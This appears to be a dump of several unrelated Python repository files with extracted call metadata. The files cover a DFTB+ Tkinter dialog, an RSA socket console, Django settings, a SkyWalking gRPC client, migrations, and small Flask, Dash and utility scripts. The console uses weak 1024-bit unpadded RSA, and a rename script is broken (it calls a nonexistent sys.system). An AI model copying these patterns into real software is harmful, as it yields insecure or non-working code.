moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((939, 15, 939, 60), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionRemoveAction', 'UpdateExpressionRemoveAction', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((950, 15, 950, 56), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionAddClause', 'UpdateExpressionAddClause', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((1013, 15, 1013, 59), 'moto.dynamodb2.parsing.ast_nodes.UpdateExpressionDeleteClause', 'UpdateExpressionDeleteClause', (), '', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((681, 31, 681, 56), 'moto.dynamodb2.parsing.ast_nodes.ExpressionPathDescender', 'ExpressionPathDescender', ({}, {}), '()', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((716, 31, 716, 65), 'moto.dynamodb2.parsing.ast_nodes.ExpressionSelector', 'ExpressionSelector', ({(716, 50, 716, 64): 'selector_value'}, {}), '(selector_value)', False, 'from moto.dynamodb2.parsing.ast_nodes import UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause\n'), ((865, 18, 865, 56), 'moto.dynamodb2.exceptions.InvalidUpdateExpression', 'InvalidUpdateExpression', ({(865, 42, 865, 55): 'function_name'}, {}), '(function_name)', False, 'from moto.dynamodb2.exceptions import InvalidTokenException, InvalidUpdateExpression\n'), ((280, 12, 280, 66), 'logging.debug', 'logging.debug', ({(280, 26, 280, 65): '"""We are out of range so end is reached"""'}, {}), "('We are out of range so end is reached')", False, 'import logging\n'), ((482, 16, 482, 44), 'logging.debug', 'logging.debug', ({(482, 30, 482, 43): '"""End reached"""'}, {}), "('End reached')", False, 'import logging\n')]
molssi-seamm/dftbplus_step
dftbplus_step/tk_optimization.py
e5b9c7462d92c25fc6f27db5e4324b05bb42e224
# -*- coding: utf-8 -*- """The graphical part of a DFTB+ Optimization node""" import logging import tkinter as tk import tkinter.ttk as ttk import dftbplus_step logger = logging.getLogger(__name__) class TkOptimization(dftbplus_step.TkEnergy): def __init__( self, tk_flowchart=None, node=None, canvas=None, x=120, y=20, w=200, h=50, my_logger=logger, keyword_metadata=None, ): """Initialize the graphical Tk DFTB+ optimization step Keyword arguments: """ self.results_widgets = [] super().__init__( tk_flowchart=tk_flowchart, node=node, canvas=canvas, x=x, y=y, w=w, h=h, my_logger=my_logger, keyword_metadata=keyword_metadata, ) def right_click(self, event): """Probably need to add our dialog...""" super().right_click(event) self.popup_menu.add_command(label="Edit..", command=self.edit) self.popup_menu.tk_popup(event.x_root, event.y_root, 0) def create_dialog( self, title="Edit DFTB+ Optimization Step", calculation="optimization" ): """Create the dialog!""" self.logger.debug("Creating the dialog") super().create_dialog(title=title, calculation=calculation) # Create all the widgets P = self.node.parameters # Frame to isolate widgets opt_frame = self["optimization frame"] = ttk.LabelFrame( self["frame"], borderwidth=4, relief="sunken", text="Optimization Parameters", labelanchor="n", padding=10, ) for key in dftbplus_step.OptimizationParameters.parameters: self[key] = P[key].widget(opt_frame) self.logger.debug("Finished creating the dialog") def reset_dialog(self, widget=None): super().reset_dialog() row = 0 self["optimization frame"].grid(row=row, column=1, sticky=tk.EW) row += 1 # And the widgets in our frame self.reset_optimization_frame() return row def reset_optimization_frame(self): """Layout the optimization frame according to the current values. SD CG gDIIS LBFGS FIRE ------------------ ------------------- ------------------- ------------------- -------- MovedAtoms MovedAtoms MovedAtoms MovedAtoms TimeStep MaxForceComponent MaxForceComponent MaxForceComponent MaxForceComponent MaxSteps MaxSteps MaxSteps MaxSteps OutputPrefix OutputPrefix OutputPrefix OutputPrefix AppendGeometries AppendGeometries AppendGeometries AppendGeometries Constraints Constraints Constraints Constraints LatticeOpt LatticeOpt LatticeOpt LatticeOpt FixAngles FixAngles FixAngles FixAngles FixLengths Isotropic Isotropic Isotropic Isotropic Pressure Pressure Pressure Pressure MaxAtomStep MaxAtomStep MaxAtomStep MaxLatticeStep MaxLatticeStep MaxLatticeStep MaxLatticeStep ConvergentForcesOnly ConvergentForcesOnly ConvergentForcesOnly ConvergentForcesOnly StepSize Alpha Memory Generations LineSearch """ # noqa: E501 frame = self["optimization frame"] for slave in frame.grid_slaves(): slave.grid_forget() method = self["optimization method"].get() widgets = [] widgets1 = [] row = 0 w = self["optimization method"] w.grid(row=row, column=0, columnspan=2, sticky=tk.EW) widgets.append(w) row += 1 if method == "Steepest descents": w = self["StepSize"] w.grid(row=row, column=1, sticky=tk.EW) widgets1.append(w) row += 1 elif "gDIIS" in method: w = self["Alpha"] w.grid(row=row, column=1, sticky=tk.EW) widgets1.append(w) row += 1 w = self["Generations"] w.grid(row=row, column=1, sticky=tk.EW) widgets1.append(w) row += 1 elif "LBFGS" in method: w = self["Memory"] w.grid(row=row, column=1, sticky=tk.EW) widgets1.append(w) row += 1 w = self["LineSearch"] w.grid(row=row, column=1, sticky=tk.EW) widgets1.append(w) row += 1 for widget in ( "MaxForceComponent", "MaxSteps", "MaxAtomStep", "stop_if_scc_fails", ): w = self[widget] w.grid(row=row, column=0, columnspan=2, sticky=tk.EW) widgets.append(w) row += 1 return row
[((11, 9, 11, 36), 'logging.getLogger', 'logging.getLogger', ({(11, 27, 11, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((64, 49, 71, 9), 'tkinter.ttk.LabelFrame', 'ttk.LabelFrame', (), '', True, 'import tkinter.ttk as ttk\n')]
aplneto/redes_projeto
console.py
450ef8ac61e46bc38ff34142d07eda3d726ce326
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """Módulo de configuração dos consoles """ from Crypto.PublicKey import RSA import socket import os import base64 class Console(object): """Superclasse Console Classe base para os terminais de cliente e servidor. Attributes: logged (bool): True caso o usuário tenha realizado o login com sucesso, False caso contrário """ def __init__(self, **kwargs): """Método construtor do console Kwargs: sock (socket): socket de comunicação key_file (str): arquivo para inicialização de par de chaves """ self.sock = kwargs.get('sock', socket.socket(socket.AF_INET, socket.SOCK_STREAM)) key_file = kwargs.get('key_file', '') if key_file: self.privatekey, self.publickey = Console.start_key(key_file) def run(self): """Método run difere entre o Console do Host e o do Client O Método run controla o comportamento do objeto como um todo. Todo o comportamento de um console individual deve ser definido dentro do método run. """ raise NotImplemented @staticmethod def start_key(key_file): """Método de inicialização das chaves Esse método inicializa a chave privada e prepara, também, a chave pública para envio. Args: key_file (str): endereço do arquivo da chave privada Returns: (tuple) uma tupla contendo um par _RSAobj (chave privada) e byte (inicializador da chave pública) """ try: keyfile = open(key_file, 'rb') except FileNotFoundError: private_key = RSA.generate(1024) else: private_key = RSA.importKey(keyfile.read()) keyfile.close() finally: public_key = private_key.publickey().exportKey() return private_key, public_key def receive_key(self): """Troca de chaves no início da comunicação Ao se conectarem, servidor e cliente trocam suas chaves públicas um com o outro. Esse método retorna um objeto do tipo RSA público a partir da chave pública recebida através de um socket. Returns: (_RSAobj) chave pública para criptografia. """ k = self.sock.recv(1024) key = RSA.importKey(k) return key def send(self, msg): """Método send envia strings simples através do socket O Método send é o método usado apara enviar mensagens simples através de um socket. Dentro desse método ocorrem as criptografias RSA e base64 antes do envio." Args: msg (str ou bytes): mensagem a ser enviada """ msg = self.encrypt(msg) self.sock.send(msg) def receive(self, b = 160): """Método receive recebe mensagens simples através do socket É através desse método que o usuário recebe mensagens simples através do socket. As mensagens chegam criptografadas e a descriptografia acontece dentro do método receive. Args: b (int): quantidade de bytes a serem recebidos Returns: (str) mensagem decifrada """ msg = self.decrypt(self.sock.recv(b)) return msg.decode('utf-8') def encrypt(self, msg): """Criptografia de uma string ou trecho de bytes Args: msg (str ou bytes): string ou bytes a serem criptografados. Returns: (bytes) segmento de bytes criptografados """ if isinstance(msg, str): msg = msg.encode('utf-8') msg = self.publickey.encrypt(msg, 3.14159265359) msg = base64.a85encode(msg[0]) return msg def decrypt(self, msg): """Método de conversão de um trecho criptografado Args: msg (bytes): trecho de mensagem a ser decifrado Returns: (bytes): trecho de bytes decifrados """ msg = base64.a85decode(msg) msg = self.privatekey.decrypt(msg) return msg def send_file(self, filename): """Rotina de envio de arquivos através de sockets Esse método controla o envio sequencial de segmentos de um arquivo através de um socket, gerando a cada envio um número inteiro referente a quantidade de bytes enviados até o momento. Método deve ser usado como um gerador. Veja exemplo abaixo. Example: for b in self.sendfile('alice.txt'): if b == -1: print("Houve um erro na transferência") else: print(str(b) + "de " str(file_size) "bytes enviados") Args: filename (str): endereço do arquivo Yields: (int) quantidade de bytes enviados ou -1, em caso de erro """ size = os.path.getsize(filename) self.send(str(size)) sent = 0 file = open(filename, 'rb') while sent < size: ack = self.receive() nxt = file.read(1024) self.sock.send(nxt) sent += len(nxt) yield sent file.close() def receive_file(self, filename): """Rotina de recebimento de arquivos através de sockets Esse método controla o recebeimendo de sementos de arquivos através de um socket. O método gera a quantidade de bytes recebidos a cada nova mensagem recebida do socket, por tanto, deve ser usado como um gerador. Example: for b in receive_file(filename): print(str(b) + " de " str(filesize) " bytes recebidos.") Args: filename(str): nome do arquivo Yields: (int) quantidade de bytes recebidos """ size = int(self.receive()) file = open(filename, 'wb') rcvd = 0 while rcvd < size: self.send('ack') nxt = self.sock.recv(1024) rcvd += len(nxt) file.write(nxt) yield rcvd file.close() def __repr__(self): return "{0}({1}, {2}, key_file = {3})".format(self.__class__.__name__, self.sock.__repr__(), self.client.__repr__(), repr(self.key_file))
[((85, 14, 85, 30), 'Crypto.PublicKey.RSA.importKey', 'RSA.importKey', ({(85, 28, 85, 29): 'k'}, {}), '(k)', False, 'from Crypto.PublicKey import RSA\n'), ((132, 14, 132, 38), 'base64.a85encode', 'base64.a85encode', ({(132, 31, 132, 37): 'msg[0]'}, {}), '(msg[0])', False, 'import base64\n'), ((144, 14, 144, 35), 'base64.a85decode', 'base64.a85decode', ({(144, 31, 144, 34): 'msg'}, {}), '(msg)', False, 'import base64\n'), ((172, 15, 172, 40), 'os.path.getsize', 'os.path.getsize', ({(172, 31, 172, 39): 'filename'}, {}), '(filename)', False, 'import os\n'), ((32, 31, 33, 64), 'socket.socket', 'socket.socket', ({(32, 45, 32, 59): 'socket.AF_INET', (33, 45, 33, 63): 'socket.SOCK_STREAM'}, {}), '(socket.AF_INET, socket.SOCK_STREAM)', False, 'import socket\n'), ((65, 26, 65, 44), 'Crypto.PublicKey.RSA.generate', 'RSA.generate', ({(65, 39, 65, 43): '1024'}, {}), '(1024)', False, 'from Crypto.PublicKey import RSA\n')]
OmenApps/marion
sandbox/settings.py
f501674cafbd91f0bbad7454e4dcf3527cf4445e
""" Django settings for marion project. """ from pathlib import Path from tempfile import mkdtemp from configurations import Configuration, values BASE_DIR = Path(__file__).parent.resolve() DATA_DIR = Path("/data") # pylint: disable=no-init class Base(Configuration): """ This is the base configuration every configuration (aka environnement) should inherit from. It is recommended to configure third-party applications by creating a configuration mixins in ./configurations and compose the Base configuration with those mixins. It depends on an environment variable that SHOULD be defined: * DJANGO_SECRET_KEY You may also want to override default configuration by setting the following environment variables: * DB_NAME * DB_HOST * DB_PASSWORD * DB_USER """ DEBUG = False # Security ALLOWED_HOSTS = [] SECRET_KEY = values.Value(None) # SECURE_PROXY_SSL_HEADER allows to fix the scheme in Django's HttpRequest # object when you application is behind a reverse proxy. # # Keep this SECURE_PROXY_SSL_HEADER configuration only if : # - your Django app is behind a proxy. # - your proxy strips the X-Forwarded-Proto header from all incoming requests # - Your proxy sets the X-Forwarded-Proto header and sends it to Django # # In other cases, you should comment the following line to avoid security issues. SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https") AUTH_PASSWORD_VALIDATORS = [ { "NAME": ( "django.contrib.auth.password_validation." "UserAttributeSimilarityValidator" ), }, {"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"}, {"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"}, {"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"}, ] # Application ROOT_URLCONF = "urls" WSGI_APPLICATION = "wsgi.application" # Database DATABASES = { "default": { "ENGINE": values.Value( "django.db.backends.postgresql_psycopg2", environ_name="DB_ENGINE", environ_prefix=None, ), "NAME": values.Value("marion", environ_name="DB_NAME", environ_prefix=None), "USER": values.Value("fun", environ_name="DB_USER", environ_prefix=None), "PASSWORD": values.Value( "pass", environ_name="DB_PASSWORD", environ_prefix=None ), "HOST": values.Value( "localhost", environ_name="DB_HOST", environ_prefix=None ), "PORT": values.Value(5432, environ_name="DB_PORT", environ_prefix=None), } } # Static files (CSS, JavaScript, Images) STATIC_URL = "/static/" STATIC_ROOT = DATA_DIR.joinpath("static") MEDIA_URL = "/media/" MEDIA_ROOT = DATA_DIR.joinpath("media") # Internationalization LANGUAGE_CODE = "en-us" TIME_ZONE = "UTC" USE_I18N = True USE_L10N = True USE_TZ = True # Application definition INSTALLED_APPS = [ "django.contrib.admin", "django.contrib.auth", "django.contrib.contenttypes", "django.contrib.sessions", "django.contrib.messages", "django.contrib.staticfiles", "rest_framework", "marion", ] MIDDLEWARE = [ "django.middleware.security.SecurityMiddleware", "django.contrib.sessions.middleware.SessionMiddleware", "django.middleware.common.CommonMiddleware", "django.middleware.csrf.CsrfViewMiddleware", "django.contrib.auth.middleware.AuthenticationMiddleware", "django.contrib.messages.middleware.MessageMiddleware", "django.middleware.clickjacking.XFrameOptionsMiddleware", ] TEMPLATES = [ { "BACKEND": "django.template.backends.django.DjangoTemplates", "DIRS": [], "APP_DIRS": True, "OPTIONS": { "context_processors": [ "django.template.context_processors.debug", "django.template.context_processors.request", "django.contrib.auth.context_processors.auth", "django.contrib.messages.context_processors.messages", ], }, }, ] class Development(Base): """ Development environment settings We set DEBUG to True and configure the server to respond from all hosts. """ DEBUG = True ALLOWED_HOSTS = ["*"] ROOT_URLCONF = "urls.debug" # Application definition INSTALLED_APPS = Base.INSTALLED_APPS + [ "howard", ] MARION_DOCUMENT_ISSUER_CHOICES_CLASS = "howard.defaults.DocumentIssuerChoices" class Test(Base): """Test environment settings""" MEDIA_ROOT = Path(mkdtemp()) ROOT_URLCONF = "urls.debug"
[((11, 11, 11, 24), 'pathlib.Path', 'Path', ({(11, 16, 11, 23): '"""/data"""'}, {}), "('/data')", False, 'from pathlib import Path\n'), ((39, 17, 39, 35), 'configurations.values.Value', 'values.Value', ({(39, 30, 39, 34): 'None'}, {}), '(None)', False, 'from configurations import Configuration, values\n'), ((162, 22, 162, 31), 'tempfile.mkdtemp', 'mkdtemp', ({}, {}), '()', False, 'from tempfile import mkdtemp\n'), ((10, 11, 10, 25), 'pathlib.Path', 'Path', ({(10, 16, 10, 24): '__file__'}, {}), '(__file__)', False, 'from pathlib import Path\n'), ((71, 22, 75, 13), 'configurations.values.Value', 'values.Value', (), '', False, 'from configurations import Configuration, values\n'), ((76, 20, 76, 87), 'configurations.values.Value', 'values.Value', (), '', False, 'from configurations import Configuration, values\n'), ((77, 20, 77, 84), 'configurations.values.Value', 'values.Value', (), '', False, 'from configurations import Configuration, values\n'), ((78, 24, 80, 13), 'configurations.values.Value', 'values.Value', (), '', False, 'from configurations import Configuration, values\n'), ((81, 20, 83, 13), 'configurations.values.Value', 'values.Value', (), '', False, 'from configurations import Configuration, values\n'), ((84, 20, 84, 83), 'configurations.values.Value', 'values.Value', (), '', False, 'from configurations import Configuration, values\n')]
cooolr/skywalking-python
skywalking/client/grpc.py
42176ff4b732000f2a75eac1affee2a681379df7
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import grpc from skywalking.protocol.common.Common_pb2 import KeyStringValuePair from skywalking.protocol.language_agent.Tracing_pb2_grpc import TraceSegmentReportServiceStub from skywalking.protocol.logging.Logging_pb2_grpc import LogReportServiceStub from skywalking.protocol.management.Management_pb2 import InstancePingPkg, InstanceProperties from skywalking.protocol.management.Management_pb2_grpc import ManagementServiceStub from skywalking.protocol.profile.Profile_pb2 import ProfileTaskCommandQuery from skywalking.protocol.profile.Profile_pb2_grpc import ProfileTaskStub from skywalking import config from skywalking.client import ServiceManagementClient, TraceSegmentReportService, ProfileTaskChannelService, \ LogDataReportService from skywalking.command import command_service from skywalking.loggings import logger from skywalking.profile import profile_task_execution_service class GrpcServiceManagementClient(ServiceManagementClient): def __init__(self, channel: grpc.Channel): self.service_stub = ManagementServiceStub(channel) def send_instance_props(self): self.service_stub.reportInstanceProperties(InstanceProperties( service=config.service_name, serviceInstance=config.service_instance, properties=[KeyStringValuePair(key='language', value='Python')], )) def send_heart_beat(self): logger.debug( 'service heart beats, [%s], [%s]', config.service_name, config.service_instance, ) self.service_stub.keepAlive(InstancePingPkg( service=config.service_name, serviceInstance=config.service_instance, )) class GrpcTraceSegmentReportService(TraceSegmentReportService): def __init__(self, channel: grpc.Channel): self.report_stub = TraceSegmentReportServiceStub(channel) def report(self, generator): self.report_stub.collect(generator) class GrpcLogDataReportService(LogDataReportService): def __init__(self, channel: grpc.Channel): self.report_stub = LogReportServiceStub(channel) def report(self, generator): self.report_stub.collect(generator) class GrpcProfileTaskChannelService(ProfileTaskChannelService): def __init__(self, channel: grpc.Channel): self.task_stub = ProfileTaskStub(channel) def do_query(self): query = ProfileTaskCommandQuery( service=config.service_name, serviceInstance=config.service_instance, lastCommandTime=profile_task_execution_service.get_last_command_create_time() ) commands = self.task_stub.getProfileTaskCommands(query) command_service.receive_command(commands)
[((37, 28, 37, 58), 'skywalking.protocol.management.Management_pb2_grpc.ManagementServiceStub', 'ManagementServiceStub', ({(37, 50, 37, 57): 'channel'}, {}), '(channel)', False, 'from skywalking.protocol.management.Management_pb2_grpc import ManagementServiceStub\n'), ((47, 8, 51, 9), 'skywalking.loggings.logger.debug', 'logger.debug', ({(48, 12, 48, 45): '"""service heart beats, [%s], [%s]"""', (49, 12, 49, 31): 'config.service_name', (50, 12, 50, 35): 'config.service_instance'}, {}), "('service heart beats, [%s], [%s]', config.service_name, config\n .service_instance)", False, 'from skywalking.loggings import logger\n'), ((60, 27, 60, 65), 'skywalking.protocol.language_agent.Tracing_pb2_grpc.TraceSegmentReportServiceStub', 'TraceSegmentReportServiceStub', ({(60, 57, 60, 64): 'channel'}, {}), '(channel)', False, 'from skywalking.protocol.language_agent.Tracing_pb2_grpc import TraceSegmentReportServiceStub\n'), ((68, 27, 68, 56), 'skywalking.protocol.logging.Logging_pb2_grpc.LogReportServiceStub', 'LogReportServiceStub', ({(68, 48, 68, 55): 'channel'}, {}), '(channel)', False, 'from skywalking.protocol.logging.Logging_pb2_grpc import LogReportServiceStub\n'), ((76, 25, 76, 49), 'skywalking.protocol.profile.Profile_pb2_grpc.ProfileTaskStub', 'ProfileTaskStub', ({(76, 41, 76, 48): 'channel'}, {}), '(channel)', False, 'from skywalking.protocol.profile.Profile_pb2_grpc import ProfileTaskStub\n'), ((87, 8, 87, 49), 'skywalking.command.command_service.receive_command', 'command_service.receive_command', ({(87, 40, 87, 48): 'commands'}, {}), '(commands)', False, 'from skywalking.command import command_service\n'), ((52, 36, 55, 9), 'skywalking.protocol.management.Management_pb2.InstancePingPkg', 'InstancePingPkg', (), '', False, 'from skywalking.protocol.management.Management_pb2 import InstancePingPkg, InstanceProperties\n'), ((83, 28, 83, 89), 'skywalking.profile.profile_task_execution_service.get_last_command_create_time', 'profile_task_execution_service.get_last_command_create_time', ({}, {}), '()', False, 'from skywalking.profile import profile_task_execution_service\n'), ((43, 24, 43, 74), 'skywalking.protocol.common.Common_pb2.KeyStringValuePair', 'KeyStringValuePair', (), '', False, 'from skywalking.protocol.common.Common_pb2 import KeyStringValuePair\n')]
glitzybunny/coingate_sandbox_payment
coingate/migrations/0004_auto_20200207_1959.py
f5686964cdd6b7d65f9f37957da4b2cda6a02f63
# Generated by Django 3.0.3 on 2020-02-07 19:59 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('coingate', '0003_auto_20200207_1513'), ] operations = [ migrations.RemoveField( model_name='payment', name='token', ), migrations.AddField( model_name='payment', name='expire_at', field=models.DateTimeField(blank=True, null=True), ), migrations.AddField( model_name='payment', name='pay_amount', field=models.DecimalField(blank=True, decimal_places=1, max_digits=10, null=True), ), migrations.AddField( model_name='payment', name='payment_address', field=models.CharField(blank=True, max_length=100, null=True), ), migrations.AlterField( model_name='payment', name='created_at', field=models.DateTimeField(auto_now_add=True, null=True), ), migrations.AlterField( model_name='payment', name='price_currency', field=models.CharField(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')], default='USD', max_length=10), ), migrations.AlterField( model_name='payment', name='receive_currency', field=models.CharField(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')], default='BTC', max_length=10), ), migrations.AlterField( model_name='payment', name='status', field=models.CharField(choices=[('new', 'Newly created invoice'), ('pending', 'Awaiting payment'), ('confirming', 'Awaiting blockchain network confirmation'), ('paid', 'Confirmed'), ('invalid', 'Rejected'), ('expired', 'Expired'), ('canceled', 'Canceled'), ('refunded', 'Refunded')], default='new', max_length=10), ), ]
[((13, 8, 16, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations, models\n'), ((20, 18, 20, 61), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((25, 18, 25, 93), 'django.db.models.DecimalField', 'models.DecimalField', (), '', False, 'from django.db import migrations, models\n'), ((30, 18, 30, 73), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((35, 18, 35, 68), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((40, 18, 40, 154), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((45, 18, 45, 154), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((50, 18, 50, 325), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n')]
SpaceTeam/space-event-trace
space_trace/__init__.py
ec00d6895e0bdc2a046ec2d45143d6f8d47ace6f
import toml from flask import Flask from flask_sqlalchemy import SQLAlchemy app = Flask(__name__, instance_relative_config=True) app.config.from_file("config.toml", load=toml.load) db = SQLAlchemy(app) @app.before_first_request def create_table(): db.create_all() from space_trace import views, cli
[((6, 6, 6, 52), 'flask.Flask', 'Flask', (), '', False, 'from flask import Flask\n'), ((8, 5, 8, 20), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', ({(8, 16, 8, 19): 'app'}, {}), '(app)', False, 'from flask_sqlalchemy import SQLAlchemy\n')]
forons/noise-generator
ng/distributions/Distribution.py
033906165adaf6e620c03bf0b91f19b6d9890cf0
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import logging from enum import Enum from .NormalDist import NormalDist from .UniformDist import UniformDist class Distribution(Enum): UNIFORM = 0 GAUSSIAN = 1 POISSON = 2 @staticmethod def determine_distribution(distribution, distribution_params): distribution_upper = distribution.upper() if not Distribution[distribution_upper] or Distribution[distribution_upper] is None: raise IndexError('Distribution not supported `{}`. Try one of: {}'.format( distribution, [(elem.value, elem.name) for elem in Distribution])) if Distribution[distribution_upper] == Distribution.UNIFORM: if not distribution_params: distribution_params = 0.5 return UniformDist(rate=float(distribution_params)) if Distribution[distribution_upper] == Distribution.GAUSSIAN: if not distribution_params: distribution_params = [0., 1.] return NormalDist(loc=float(distribution_params[0]), scale=float(distribution_params[1])) if Distribution[distribution_upper] is Distribution.POISSON: pass raise IndexError('Distribution not supported `{}`. Try one of: {}'.format( distribution, [(elem.value, elem.name) for elem in Distribution]))
[]
Riteme/test
test/rename.py
b511d6616a25f4ae8c3861e2029789b8ee4dcb8d
import os import sys filename = sys.argv[1] from_id = int(sys.argv[2]) to_id = int(sys.argv[2]) for i in range(from_id, to_id + 1): sys.system("mv {0}.in{1} {0}{1}.in".format(filename, i)) sys.system("mv {0}.out{1} {0}{1}.out".format(filename, i))
[]
Savior-19/Savior19
TransitPass/urls.py
b80c05a19ebadf73c3d88656b7c34b761cb02f3c
from django.urls import path from . import views urlpatterns = [ path('apply/', views.FillPassApplication, name='transit-pass-application-form'), path('application-details/<int:appln_id>', views.DisplayApplicationToken, name='application-details'), path('view-application-list/', views.DisplayApplicationList, name='view-application-list'), path('view-application/<int:appln_id>/', views.DisplayIndividualApplication, name='view-individual-application'), path('check-application-status/', views.CheckApplicationStatus, name='check-application-status'), path('check-pass-validity/', views.CheckPassValidity, name='check-pass-validity'), ]
[((6, 4, 6, 83), 'django.urls.path', 'path', (), '', False, 'from django.urls import path\n'), ((8, 4, 8, 105), 'django.urls.path', 'path', (), '', False, 'from django.urls import path\n'), ((10, 4, 10, 94), 'django.urls.path', 'path', (), '', False, 'from django.urls import path\n'), ((12, 4, 12, 116), 'django.urls.path', 'path', (), '', False, 'from django.urls import path\n'), ((14, 4, 14, 100), 'django.urls.path', 'path', (), '', False, 'from django.urls import path\n'), ((16, 4, 16, 85), 'django.urls.path', 'path', (), '', False, 'from django.urls import path\n')]
kozo2/dash-docs
dash_docs/chapters/dash_core_components/Textarea/examples/textarea_basic.py
5140cfd1fda439233e8b95e2443332a32a2453f5
import dash from dash.dependencies import Input, Output import dash_html_components as html import dash_core_components as dcc app = dash.Dash(__name__) app.layout = html.Div([ dcc.Textarea( id='textarea-example', value='Textarea content initialized\nwith multiple lines of text', style={'width': '100%', 'height': 300}, ), html.Div(id='textarea-example-output', style={'whiteSpace': 'pre-line'}) ]) @app.callback( Output('textarea-example-output', 'children'), [Input('textarea-example', 'value')] ) def update_output(value): return 'You have entered: \n{}'.format(value) if __name__ == '__main__': app.run_server(debug=True)
